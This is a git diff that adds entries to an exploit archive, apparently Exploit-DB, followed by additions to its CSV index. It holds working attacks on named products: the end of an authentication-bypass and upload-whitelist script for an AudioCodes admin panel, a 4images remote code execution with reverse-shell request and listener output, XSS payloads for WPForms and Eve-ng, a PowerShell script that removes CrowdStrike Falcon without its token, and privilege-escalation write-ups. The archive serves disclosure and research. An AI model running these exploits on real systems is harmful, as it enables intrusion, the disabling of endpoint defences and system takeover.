+      print('-----------------------------------------------------------------------')
+      time.sleep(1)
+      print((", ".join(re.findall(r'</form>(.+?)</section>',str(r.content)))).replace('\\r\\n', '').replace('</div>', '').replace('<div>', '').replace('</DIV>', '').replace('<DIV>', '').replace('<br/>', '').lstrip())
+      print('-----------------------------------------------------------------------')
+   except:
+      sys.exit()
+
+def patch_ext(s,target,opt,ext):
+   try:
+     if(opt == '1'):
+       print('\nTrying to add extension to whitelist..')
+       body = {'action':'saveext','extensions':f'.cab,.cfg,.csv,.id,.img,.{ext},.zip'}
+     if(opt == '2'):
+       print('\nCleaning up..')
+       body = {'action':'saveext','extensions':'.cab,.cfg,.csv,.id,.img,.zip'}
+       print(f'{Fore.GREEN}(+) {ext.upper()} extension removed\n{Style.RESET_ALL}')
+     url = f'http://{target}/admin/AudioCodes_files/ajax/ajaxGlobalSettings.php'
+     r = s.post(url, data = body, headers=headers)
+     time.sleep(1)
+     if(f'{ext}' in r.text):
+        return True
+   except:
+      sys.exit()
+
+def main():
+   if len(sys.argv) != 2:
+      print(' Usage: ' + sys.argv[0] + ' <target IP>')
+      print(' Example: ' + sys.argv[0] + ' 172.16.86.154')
+      sys.exit(1)
+
+   target = sys.argv[1]
+   menu()
+   s = bypass_auth(target)
+   if(s):
+     optionlist(s,target)
+
+if __name__ == '__main__':
+    main()
+
+# Timeline
+# 11-11-2021 Vulnerabilities discovered
+# 12-11-2021 PoC written
+# 15-11-2021 Details shared with vendor
+# 02-12-2021 Vendor confirmed vulnerabilities
+# 03-12-2021 CVE's requested
+# 09-12-2021 Vendor replied with solution and notified customers
+# 07-02-2022 Product EOL announced
+# 10-03-2022 CVE's assigned
+# 02-12-2022 Disclosure of findings
\ No newline at end of file
diff --git a/exploits/php/webapps/51147.txt b/exploits/php/webapps/51147.txt
new file mode 100644
index 000000000..05cbf15f9
--- /dev/null
+++ b/exploits/php/webapps/51147.txt
@@ -0,0 +1,60 @@
+# Exploit Title: 4images 1.9 - Remote Command Execution (RCE)
+# Exploit Author: Andrey Stoykov
+# Software Link: https://www.4homepages.de/download-4images
+# Version: 1.9
+# Tested on: Ubuntu 20.04
+
+
+To reproduce do the following:
+
+1. Login as administrator user
+2. Browse to "General" -> " Edit Templates" -> "Select Template Pack" -> "d=
+efault_960px" -> "Load Theme"
+3. Select Template "categories.html"
+4. Paste reverse shell code
+5. Click "Save Changes"
+6. Browse to "http://host/4images/categories.php?cat_id=3D1"
+
+
+// HTTP POST request showing reverse shell payload
+
+POST /4images/admin/templates.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100=
+101 Firefox/100.0
+[...]
+
+__csrf=3Dc39b7dea0ff15442681362d2a583c7a9&action=3Dsavetemplate&content=3D[=
+REVERSE_SHELL_CODE]&template_file_name=3Dcategories.html&template_folder=3D=
+default_960px[...]
+
+
+
+// HTTP redirect response to specific template
+
+GET /4images/categories.php?cat_id=3D1 HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100=
+101 Firefox/100.0
+[...]
+
+
+# nc -kvlp 4444
+listening on [any] 4444 ...
+connect to [127.0.0.1] from localhost [127.0.0.1] 43032
+Linux kali 6.0.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.7-1kali1 (20=
+22-11-07) x86_64 GNU/Linux
+ 13:54:28 up  2:18,  2 users,  load average: 0.09, 0.68, 0.56
+USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
+kali     tty7     :0               11:58    2:18m  2:21   0.48s xfce4-sessi=
+on
+kali     pts/1    -                11:58    1:40  24.60s  0.14s sudo su
+uid=3D1(daemon) gid=3D1(daemon) groups=3D1(daemon)
+/bin/sh: 0: can't access tty; job control turned off
+$=20
+
+
+
+
+
+--sgnirk-7d26becc-c589-46c6-a348-fe09d4b162fe--
\ No newline at end of file
diff --git a/exploits/php/webapps/51152.txt b/exploits/php/webapps/51152.txt
new file mode 100644
index 000000000..c75c34085
--- /dev/null
+++ b/exploits/php/webapps/51152.txt
@@ -0,0 +1,13 @@
+# Exploit Title: WPForms 1.7.8 - Cross-Site Scripting (XSS)
+# Date: 2022-12-05
+# Author: Milad karimi
+# Software Link: https://wordpress.org/plugins/wpforms-lite
+# Version: 1.7.8
+# Tested on: Windows 10
+# CVE: N/A
+
+1. Description:
+This plugin creates a WPForms from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
+
+2. Proof of Concept:
+https://$target/ListTable.php?foobar=<script>alert("Ex3ptionaL")</script>
\ No newline at end of file
diff --git a/exploits/php/webapps/51153.txt b/exploits/php/webapps/51153.txt
new file mode 100644
index 000000000..dde6fc07a
--- /dev/null
+++ b/exploits/php/webapps/51153.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Eve-ng 5.0.1-13 - Stored Cross-Site Scripting (XSS)
+# Google Dork: N/A
+# Date: 12/6/2022
+# Exploit Author: @casp3r0x0 hassan ali al-khafaji
+# Vendor Homepage: https://www.eve-ng.net/
+# Software Link: https://www.eve-ng.net/index.php/download/
+# Version: Free EVE Community Edition Version 5.0.1-13
+# Tested on: Free EVE Community Edition Version 5.0.1-13
+# CVE : N/A
+
+
+
+#we could achieve stored XSS on eve-ng free I don't know If this
+effect pro version also
+#first create a new lab
+#second create a Text label
+#insert the xss payload and click save "><script>alert(1)</script>
+#the application is multi user if any user open the lab the xss will be triggered.
\ No newline at end of file
diff --git a/exploits/windows/local/51143.txt b/exploits/windows/local/51143.txt
new file mode 100644
index 000000000..1ac433a41
--- /dev/null
+++ b/exploits/windows/local/51143.txt
@@ -0,0 +1,31 @@
+#Exploit Title: Lavasoft web companion 4.1.0.409 - 'DCIservice' Unquoted Service Path
+# Author: P4p4 M4n3
+# Discovery Date: 25-11-2022
+# Vendor Homepage: https://webcompanion.com/en/
+# Version 4.1.0.409
+# Tested on:  Microsoft Windows Server 2019 Datacenter x64
+
+# Description:
+# Lavasoft 4.1.0.409 install DCIservice  as a service with an unquoted service path
+# POC https://youtu.be/yb8AavCMbes
+
+#Discover the Unquoted Service path
+
+C:\Users\p4p4\> wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
+
+DCIService        C:\Program Files (x86)\Lavasoft\Web Companion\Service\x64\DCIService.exe    Auto
+
+
+C:\Users\p4p4> sc qc DCIService
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: DCIService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Lavasoft\Web Companion\Service\x64\DCIService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : DCIService
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/51146.ps1 b/exploits/windows/local/51146.ps1
new file mode 100644
index 000000000..b290e70c3
--- /dev/null
+++ b/exploits/windows/local/51146.ps1
@@ -0,0 +1,46 @@
+# Exploit Title: CrowdStrike Falcon AGENT  6.44.15806  - Uninstall without Installation Token
+# Date: 30/11/2022
+# Exploit Author: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi (Deda Cloud Cybersecurity Team)
+# Vendor Homepage: https://www.crowdstrike.com/
+# Author Homepage: https://www.deda.cloud/
+# Tested On: All Windows versions
+# Version: 6.44.15806
+# CVE: Based on CVE-2022-2841; Modified by Deda Cloud Purple Team members, to exploit hotfixed release. Pubblication of of CVE-2022-44721 in progress.
+
+
+$InstalledSoftware = Get-ChildItem "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall"
+
+foreach($obj in $InstalledSoftware){
+    if ("CrowdStrike Sensor Platform" -eq $obj.GetValue('DisplayName'))
+    {
+        $uninstall_uuid = $obj.Name.Split("\")[6]
+    }
+}
+
+$g_msiexec_instances = New-Object System.Collections.ArrayList
+
+Write-Host "[+] Identified installed Falcon: $uninstall_uuid"
+Write-Host "[+] Running uninstaller for Crowdstrike Falcon . . ."
+Start-Process "msiexec" -ArgumentList "/X$uninstall_uuid"
+
+while($true)
+{
+	if (get-process -Name "CSFalconService") {
+		Get-Process | Where-Object { $_.Name -eq "msiexec" } | ForEach-Object {
+
+			if (-Not $g_msiexec_instances.contains($_.id)){
+				$g_msiexec_instances.Add($_.id)
+				if (4 -eq $g_msiexec_instances.count -or 5 -eq $g_msiexec_instances.count){
+					Start-Sleep -Milliseconds 100
+					Write-Host "[+] Killing PID " + $g_msiexec_instances[-1]
+					stop-process -Force -Id $g_msiexec_instances[-1]
+				}
+
+			}
+
+		}
+	} else {
+		Write-Host "[+] CSFalconService process vanished...reboot and have fun!"
+		break
+	}
+}
\ No newline at end of file
diff --git a/exploits/windows/local/51151.txt b/exploits/windows/local/51151.txt
new file mode 100644
index 000000000..cf6885d09
--- /dev/null
+++ b/exploits/windows/local/51151.txt
@@ -0,0 +1,48 @@
+# Exploit Title: Zillya Total Security 3.0.2367.0  - Local Privilege Escalation
+# Date: 02.12.2022
+# Author: M. Akil Gündoğan
+# Contact: https://twitter.com/akilgundogan
+# Vendor Homepage: https://zillya.com/
+# Software Link: (https://download.zillya.com/ZTS3.exe) / (https://download.zillya.com/ZIS3.exe)
+# Version: IS (3.0.2367.0) / TS (3.0.2368.0)
+# Tested on: Windows 10 Professional x64
+# PoC Video: https://youtu.be/vRCZR1kd89Q
+
+Vulnerabiliy Description:
+---------------------------------------
+Zillya's processes run in SYSTEM privileges. The user with low privileges in the system can copy any file they want
+to any location by using the quarantine module in Zillya. This is an example of AVGater vulnerabilities that are often
+found in antivirus programs.
+
+You can read the article about AVGater vulnerabilities here:
+https://bogner.sh/2017/11/avgater-getting-local-admin-by-abusing-the-anti-virus-quarantine/
+
+The vulnerability affects both "Zillya Total Security" and "Zillya Internet Security" products.
+
+Step by step produce:
+---------------------------------------
+1 - Attackers create new folder and into malicious file. It can be a DLL or any file.
+
+2 - Attacker waits for "Zillya Total Security" or "Zillya Internet Security" to quarantine him.
+
+3 - The created folder is linked with the Google Symbolic Link Tools "Create Mount Point" tools to the folder that
+the current user does not have write permission to.
+
+You can find these tools here: https://github.com/googleprojectzero/symboliclink-testing-tools
+
+4 - Restores the quarantined file. When checked, it is seen that the file has been moved to an unauthorized location.
+This is evidence of escalation vulnerability. An attacker with an unauthorized user can write to directories that require
+authorization. Using techniques such as DLL hijacking, it can gain access to SYSTEM privileges.
+
+Advisories:
+---------------------------------------
+Developers should not allow unauthorized users to restore from quarantine unless necessary.
+
+Also, it should be checked whether the target file has been copied to the original location. Unless necessary, users
+should not be able to interfere with processes running with SYSTEM privileges. All processes on the user's side should
+be run with normal privileges.
+
+Disclosure Timeline:
+---------------------------------------
+13.11.2022 - Vulnerability reported via email but no response was given and the fix was not released.
+02.12.2022 - Full disclosure.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index b600b9df7..bad9708e7 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -2511,6 +2511,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 24703,exploits/cgi/webapps/24703.txt,"LinuxStat 2.x - Directory Traversal",2004-10-25,anonymous,webapps,cgi,,2004-10-25,2013-03-10,1,CVE-2004-2640;OSVDB-11103,,,,,https://www.securityfocus.com/bid/11517/info
 187,exploits/cgi/webapps/187.pl,"ListMail 112 - Command Execution",2000-11-17,teleh0r,webapps,cgi,,2000-11-16,,1,OSVDB-60868,,,,,
 37638,exploits/cgi/webapps/37638.txt,"LISTSERV 16 - 'SHOWTPL' Cross-Site Scripting",2012-08-17,"Jose Carlos de Arriba",webapps,cgi,,2012-08-17,2015-07-18,1,,,,,,https://www.securityfocus.com/bid/55082/info
+51149,exploits/cgi/webapps/51149.txt,"LISTSERV 17 - Insecure Direct Object Reference (IDOR)",2023-03-30,"Shaunt Der-Grigorian",webapps,cgi,,2023-03-30,2023-03-30,0,CVE-2022-40319,,,,,
+51148,exploits/cgi/webapps/51148.txt,"LISTSERV 17 - Reflected Cross Site Scripting (XSS)",2023-03-30,"Shaunt Der-Grigorian",webapps,cgi,,2023-03-30,2023-03-30,0,CVE-2022-39195,,,,,
 26917,exploits/cgi/webapps/26917.txt,"LiveJournal - Cleanhtml.pl HTML Injection",2005-12-20,"Andrew Farmer",webapps,cgi,,2005-12-20,2013-07-18,1,CVE-2005-4454;OSVDB-21896,,,,,https://www.securityfocus.com/bid/15990/info
 21802,exploits/cgi/webapps/21802.txt,"Lycos HTMLGear - guestGear CSS HTML Injection",2002-09-17,"Matthew Murphy",webapps,cgi,,2002-09-17,2012-10-08,1,CVE-2002-1493;OSVDB-9214,,,,,https://www.securityfocus.com/bid/5728/info
 18841,exploits/cgi/webapps/18841.txt,"Lynx Message Server - Multiple Vulnerabilities",2012-05-07,"Mark Lachniet",webapps,cgi,,2012-05-07,2012-05-07,0,OSVDB-81822;OSVDB-81821;OSVDB-81820,,,,,
@@ -3145,6 +3147,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 23672,exploits/hardware/dos/23672.txt,"Red-M Red-Alert 3.1 - Remote Denial of Service",2004-02-09,"Bruno Morisson",dos,hardware,,2004-02-09,2012-12-25,1,CVE-2004-2078;OSVDB-3891,,,,,https://www.securityfocus.com/bid/9618/info
 688,exploits/hardware/dos/688.c,"Ricoh Aficio 450/455 PCL 5e Printer - ICMP Denial of Service",2004-12-15,x90c,dos,hardware,,2004-12-14,,1,OSVDB-12478,,,,,
 24839,exploits/hardware/dos/24839.c,"Ricoh Aficio 450/455 PCL Printer - Remote ICMP Denial of Service",2004-12-14,"Hongzhen Zhou",dos,hardware,,2004-12-14,2013-03-18,1,,,,,,https://www.securityfocus.com/bid/11932/info
+51137,exploits/hardware/dos/51137.py,"Router ZTE-H108NS - Stack Buffer Overflow (DoS)",2023-03-30,"George Tsimpidas",dos,hardware,,2023-03-30,2023-03-30,0,,,,,,
 36309,exploits/hardware/dos/36309.py,"Sagem F@st 3304-V2 - Telnet Crash (PoC)",2015-03-08,"Loudiyi Mohamed",dos,hardware,,2015-03-12,2015-03-12,0,OSVDB-119602,,,,,
 34172,exploits/hardware/dos/34172.txt,"Sagem Fast 3304-V1 - Denial of Service",2014-07-27,Z3ro0ne,dos,hardware,,2014-07-27,2014-08-06,0,OSVDB-109608,,,,,
 11633,exploits/hardware/dos/11633.pl,"Sagem Routers - Remote Reset",2010-03-04,AlpHaNiX,dos,hardware,,2010-03-03,,0,,,,,,
@@ -3805,6 +3808,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9858,exploits/hardware/remote/9858.txt,"Riorey RIOS 4.7.0 - Hard-Coded Password",2009-10-08,"Marek Kroemeke",remote,hardware,8022,2009-10-07,2016-10-29,1,CVE-2009-3710;OSVDB-58858,,,,,
 8269,exploits/hardware/remote/8269.txt,"Rittal CMC-TC Processing Unit II - Multiple Vulnerabilities",2009-03-23,"Louhi Networks",remote,hardware,,2009-03-22,,1,OSVDB-56342;OSVDB-56341;OSVDB-56340;OSVDB-56339,,2009-Louhi_CMC-brute_090323.zip,,,http://www.louhinetworks.fi/advisory/Louhi_CMC-brute_090323.zip
 24892,exploits/hardware/remote/24892.txt,"Rosewill RSVA11001 - Remote Command Injection",2013-03-26,"Eric Urban",remote,hardware,,2013-03-26,2013-03-26,0,OSVDB-91630,,,,,
+51138,exploits/hardware/remote/51138.txt,"Router ZTE-H108NS - Authentication Bypass",2023-03-30,"George Tsimpidas",remote,hardware,,2023-03-30,2023-03-30,0,,,,,,
 18779,exploits/hardware/remote/18779.txt,"RuggedCom Devices - Backdoor Access",2012-04-24,jc,remote,hardware,,2012-04-24,2012-04-24,0,CVE-2012-2441;OSVDB-81406;CVE-2012-1803,,,,,
 50930,exploits/hardware/remote/50930.py,"Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)",2022-05-11,"Minh Khoa",remote,hardware,,2022-05-11,2022-05-11,0,CVE-2021-43164,,,,,
 35800,exploits/hardware/remote/35800.txt,"RXS-3211 IP Camera - UDP Packet Password Information Disclosure",2011-05-25,"Spare Clock Cycles",remote,hardware,,2011-05-25,2015-01-16,1,,,,,,https://www.securityfocus.com/bid/47976/info
@@ -8749,6 +8753,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34086,exploits/linux/webapps/34086.txt,"BitDefender GravityZone 5.1.5.386 - Multiple Vulnerabilities",2014-07-16,"SEC Consult",webapps,linux,443,2014-07-16,2014-07-16,0,OSVDB-109194;OSVDB-109193;OSVDB-109192;OSVDB-109191;CVE-2014-5350,,,,,
 42290,exploits/linux/webapps/42290.txt,"BOA Web Server 0.94.14rc21 - Arbitrary File Access",2017-06-20,"Miguel Mendez Z",webapps,linux,,2017-07-03,2017-07-03,0,CVE-2017-9833,,,,,
 36689,exploits/linux/webapps/36689.txt,"BOA Web Server 0.94.8.2 - Arbitrary File Access",2000-12-19,llmora,webapps,linux,,2015-04-09,2015-04-09,0,CVE-2000-0920,,,,,http://www.s21sec.com/en/avisos/
+51139,exploits/linux/webapps/51139.txt,"Boa Web Server v0.94.14 - Authentication Bypass",2023-03-30,"George Tsimpidas",webapps,linux,,2023-03-30,2023-03-30,0,,,,,,
 34672,exploits/linux/webapps/34672.txt,"CacheGuard-OS 5.7.7 - Cross-Site Request Forgery",2014-09-15,"William Costa",webapps,linux,8090,2014-09-15,2014-09-15,0,CVE-2014-4865;OSVDB-111270,,,,,
 49362,exploits/linux/webapps/49362.py,"Cassandra Web 0.5.0 - Remote File Read",2021-01-05,"Jeremy Brown",webapps,linux,,2021-01-05,2021-01-05,0,,,,,,
 47123,exploits/linux/webapps/47123.txt,"CentOS Control Web Panel 0.9.8.836 - Authentication Bypass",2019-07-16,"Pongtorn Angsuchotmetee",webapps,linux,,2019-07-16,2019-07-16,0,CVE-2019-13605;CVE-2019-13360,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,
@@ -11566,6 +11571,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9916,exploits/multiple/webapps/9916.rb,"ContentKeeper Web Appliance < 125.10 - Command Execution (Metasploit)",2009-02-25,patrick,webapps,multiple,,2009-02-24,,1,OSVDB-54551,"Metasploit Framework (MSF)",,,,
 46820,exploits/multiple/webapps/46820.txt,"Cortex Unshortenlink Analyzer < 1.1 - Server-Side Request Forgery",2019-05-10,"Alexandre Basquin",webapps,multiple,,2019-05-10,2019-05-13,1,CVE-2019-7652,"Server-Side Request Forgery (SSRF)",,,,
 49731,exploits/multiple/webapps/49731.txt,"CourseMS 2.1 - 'name' Stored XSS",2021-03-31,cptsticky,webapps,multiple,,2021-03-31,2021-03-31,0,,,,,,
+51141,exploits/multiple/webapps/51141.py,"Covenant v0.5 - Remote Code Execution (RCE)",2023-03-30,xThaz,webapps,multiple,,2023-03-30,2023-03-30,0,,,,,,
 9726,exploits/multiple/webapps/9726.py,"cP Creator 2.7.1 - SQL Injection",2009-09-21,"Sina Yazdanmehr",webapps,multiple,,2009-09-20,,1,OSVDB-58259;CVE-2009-3330,,,,,
 11211,exploits/multiple/webapps/11211.txt,"cPanel - HTTP Response Splitting",2010-01-21,Trancer,webapps,multiple,,2010-01-20,,1,OSVDB-61954,,cpanel_http_response_splitting_vulnerability.pdf,,,
 11527,exploits/multiple/webapps/11527.html,"cPanel - Multiple Cross-Site Request Forgery Vulnerabilities",2010-02-22,SecurityRules,webapps,multiple,,2010-02-21,,0,,,,,,
@@ -11596,6 +11602,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 39419,exploits/multiple/webapps/39419.txt,"dotDefender Firewall 5.00.12865/5.13-13282 - Cross-Site Request Forgery",2016-02-08,hyp3rlinx,webapps,multiple,,2016-02-08,2016-02-08,0,,,,,,http://hyp3rlinx.altervista.org/advisories/DOT-DEFENDER-CSRF.txt
 47449,exploits/multiple/webapps/47449.txt,"DotNetNuke 9.3.2 - Cross-Site Scripting",2019-10-01,"Semen Alexandrovich Lyhin",webapps,multiple,,2019-10-01,2020-06-18,0,,,,,,
 47448,exploits/multiple/webapps/47448.py,"DotNetNuke < 9.4.0 - Cross-Site Scripting",2019-10-01,MaYaSeVeN,webapps,multiple,80,2019-10-01,2019-10-01,0,CVE-2019-12562,"Cross-Site Scripting (XSS)",,,,
+51134,exploits/multiple/webapps/51134.txt,"Dreamer CMS v4.0.0 - SQL Injection",2023-03-30,lvren,webapps,multiple,,2023-03-30,2023-03-30,0,CVE-2022-43128,,,,,
 17606,exploits/multiple/webapps/17606.txt,"DZYGroup CMS Portal - Multiple SQL Injections",2011-08-04,Netrondoank,webapps,multiple,,2011-08-04,2011-08-04,1,,,,,,
 49799,exploits/multiple/webapps/49799.py,"DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS)",2021-04-23,nu11secur1ty,webapps,multiple,,2021-04-23,2021-04-23,0,CVE-2021-3318,,,,,
 12715,exploits/multiple/webapps/12715.pl,"e107 - Code Exection",2010-05-24,McFly,webapps,multiple,,2010-05-23,,1,OSVDB-65291;CVE-2010-2099;OSVDB-65243,,,,,
@@ -11990,6 +11997,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50712,exploits/multiple/webapps/50712.rb,"Servisnet Tessa - Privilege Escalation (Metasploit)",2022-02-04,AkkuS,webapps,multiple,,2022-02-04,2022-02-08,0,CVE-2022-22833,,,,,
 49133,exploits/multiple/webapps/49133.py,"Setelsa Conacwin 3.7.1.2 - Local File Inclusion",2020-12-01,"Bryan Rodriguez Martin",webapps,multiple,,2020-12-01,2020-12-01,0,,,,,,
 36794,exploits/multiple/webapps/36794.txt,"SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities",2015-04-21,Vulnerability-Lab,webapps,multiple,,2015-04-21,2015-04-21,0,,,,,,https://www.vulnerability-lab.com/get_content.php?id=1314
+51150,exploits/multiple/webapps/51150.txt,"Shoplazza 1.1 - Stored Cross-Site Scripting (XSS)",2023-03-30,"Andrey Stoykov",webapps,multiple,,2023-03-30,2023-03-30,0,,,,,,
 48712,exploits/multiple/webapps/48712.txt,"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)",2020-07-26,bdrake,webapps,multiple,,2020-07-26,2020-07-26,0,,,,,,
 50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,,2021-06-30,2021-06-30,0,,,,,,
 33717,exploits/multiple/webapps/33717.txt,"Six Apart Vox - 'search' Page Cross-Site Scripting",2010-03-05,Phenom,webapps,multiple,,2010-03-05,2014-06-12,1,,,,,,https://www.securityfocus.com/bid/38575/info
@@ -12070,6 +12078,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50078,exploits/multiple/webapps/50078.txt,"Vianeos OctoPUS 5 - 'login_user' SQLi",2021-07-01,"Audencia Business SCHOOL Red Team",webapps,multiple,,2021-07-01,2021-07-01,0,,,,,,
 11409,exploits/multiple/webapps/11409.txt,"Video Games Rentals Script - SQL Injection",2010-02-11,JaMbA,webapps,multiple,80,2010-02-10,2010-11-12,1,OSVDB-62295;CVE-2010-0690,,,,,
 38706,exploits/multiple/webapps/38706.txt,"VideoLAN VLC Media Player Web Interface 2.2.1 - Metadata Title Cross-Site Scripting",2015-11-16,"Andrea Sindoni",webapps,multiple,,2015-11-16,2015-11-16,0,OSVDB-130352,,,,,
+51142,exploits/multiple/webapps/51142.txt,"Virtual Reception v1.0 - Web Server Directory Traversal",2023-03-30,Spinae,webapps,multiple,,2023-03-30,2023-03-30,0,,,,,,
 50098,exploits/multiple/webapps/50098.txt,"Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)",2021-07-06,"Andrea D\'Ubaldo",webapps,multiple,,2021-07-06,2021-10-15,0,CVE-2021-42071,,,,,
 48535,exploits/multiple/webapps/48535.txt,"VMware vCenter Server 6.7 - Authentication Bypass",2020-06-01,Photubias,webapps,multiple,,2020-06-01,2020-06-01,0,CVE-2020-3952,,,,,
 50056,exploits/multiple/webapps/50056.py,"VMware vCenter Server 7.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-06-24,CHackA0101,webapps,multiple,,2021-06-24,2021-10-28,0,CVE-2021-21972,,,,,
@@ -13026,6 +13035,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 2487,exploits/php/webapps/2487.php,"4Images 1.7.x - 'search.php' SQL Injection",2006-10-08,Synsta,webapps,php,,2006-10-07,,1,OSVDB-29567;CVE-2006-5236,,,,,
 50193,exploits/php/webapps/50193.txt,"4images 1.8 - 'limitnumber' SQL Injection (Authenticated)",2021-08-13,"Andrey Stoykov",webapps,php,,2021-08-13,2021-08-13,0,,,,,,
 49945,exploits/php/webapps/49945.txt,"4Images 1.8 - 'redirect' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php,,2021-06-03,2021-06-03,0,CVE-2021-27308,,,,http://www.exploit-db.com4images1.8.zip,
+51147,exploits/php/webapps/51147.txt,"4images 1.9 - Remote Command Execution (RCE)",2023-03-30,"Andrey Stoykov",webapps,php,,2023-03-30,2023-03-30,0,,,,,,
 18592,exploits/php/webapps/18592.txt,"4Images Image Gallery Management System - Cross-Site Request Forgery",2012-03-13,"Dmar al3noOoz",webapps,php,,2012-03-13,2012-03-13,0,OSVDB-80606,,,,,
 49339,exploits/php/webapps/49339.txt,"4images v1.7.11 - 'Profile Image' Stored Cross-Site Scripting",2021-01-04,"Ritesh Gohil",webapps,php,,2021-01-04,2021-01-04,0,,,,,,
 18497,exploits/php/webapps/18497.txt,"4PSA CMS - SQL Injection",2012-02-19,"BHG Security Center",webapps,php,,2012-02-19,2012-02-19,0,OSVDB-80802,,,,,
@@ -15522,6 +15532,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9037,exploits/php/webapps/9037.txt,"Clicknet CMS 2.1 - 'side' Arbitrary File Disclosure",2009-06-29,"ThE g0bL!N",webapps,php,,2009-06-28,,1,OSVDB-55484;CVE-2009-2325,,,,,
 12500,exploits/php/webapps/12500.txt,"Clicksor - SQL Injection",2010-05-04,JM511,webapps,php,,2010-05-03,,1,,,,,,
 21454,exploits/php/webapps/21454.txt,"Clicky Web Pseudo-frames 1.0 - Remote File Inclusion",2002-05-12,frog,webapps,php,,2002-05-12,2012-09-22,1,OSVDB-86919,,,,,https://www.securityfocus.com/bid/4756/info
+51135,exploits/php/webapps/51135.txt,"ClicShopping v3.402 - Cross-Site Scripting (XSS)",2023-03-30,nu11secur1ty,webapps,php,,2023-03-30,2023-03-30,0,,,,,,
 41287,exploits/php/webapps/41287.txt,"Client Expert 1.0.1 - SQL Injection",2017-02-09,"Ihsan Sencan",webapps,php,,2017-02-09,2017-02-09,0,,,,,,
 48956,exploits/php/webapps/48956.txt,"Client Management System 1.0 - 'searchdata' SQL injection",2020-10-27,"Serkan Sancar",webapps,php,,2020-10-27,2020-10-27,0,,,,,,
 50177,exploits/php/webapps/50177.txt,"Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS)",2021-08-04,"Mohammad Koochaki",webapps,php,,2021-08-04,2021-08-04,0,,,,,,
@@ -15903,6 +15914,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 15915,exploits/php/webapps/15915.py,"Concrete CMS 5.4.1.1 - Cross-Site Scripting / Remote Code Execution",2011-01-05,mr_me,webapps,php,,2011-01-05,2011-01-07,1,,,,,http://www.exploit-db.comconcrete5.4.1.1.zip,
 37225,exploits/php/webapps/37225.pl,"Concrete CMS < 5.5.21 - Multiple Vulnerabilities",2012-05-20,AkaStep,webapps,php,,2012-05-20,2016-12-18,1,OSVDB-82440,,,,,https://www.securityfocus.com/bid/53640/info
 49721,exploits/php/webapps/49721.txt,"Concrete5 8.5.4 - 'name' Stored XSS",2021-03-29,"Quadron Research Lab",webapps,php,,2021-03-29,2021-03-29,0,CVE-2021-3111,,,,,
+51144,exploits/php/webapps/51144.txt,"Concrete5 CME v9.1.3 - Xpath injection",2023-03-30,nu11secur1ty,webapps,php,,2023-03-30,2023-03-30,0,,,,,,
 37103,exploits/php/webapps/37103.txt,"Concrete5 CMS 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting",2012-04-26,"Jakub Galczyk",webapps,php,,2012-04-26,2017-08-14,1,,,,,,https://www.securityfocus.com/bid/53268/info
 26077,exploits/php/webapps/26077.txt,"Concrete5 CMS 5.6.1.2 - Multiple Vulnerabilities",2013-06-10,expl0i13r,webapps,php,,2013-06-10,2013-06-10,0,OSVDB-94201;OSVDB-94200;OSVDB-94199,,,,http://www.exploit-db.comconcrete5.6.1.2.zip,
 31735,exploits/php/webapps/31735.txt,"Concrete5 CMS 5.6.2.1 - 'index.php?cID' SQL Injection",2014-02-18,killall-9,webapps,php,80,2014-02-18,2017-08-14,0,OSVDB-103570,,,,http://www.exploit-db.comconcrete5.6.2.1.zip,
@@ -16580,6 +16592,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 7014,exploits/php/webapps/7014.txt,"DevelopItEasy News And Article System 1.4 - SQL Injection",2008-11-06,InjEctOr5,webapps,php,,2008-11-05,,1,OSVDB-49758;CVE-2008-5131;OSVDB-49757,,,,,
 7016,exploits/php/webapps/7016.txt,"DevelopItEasy Photo Gallery 1.2 - SQL Injection",2008-11-06,InjEctOr5,webapps,php,,2008-11-05,,1,OSVDB-49807;CVE-2008-6348;OSVDB-49806;OSVDB-49805,,,,,
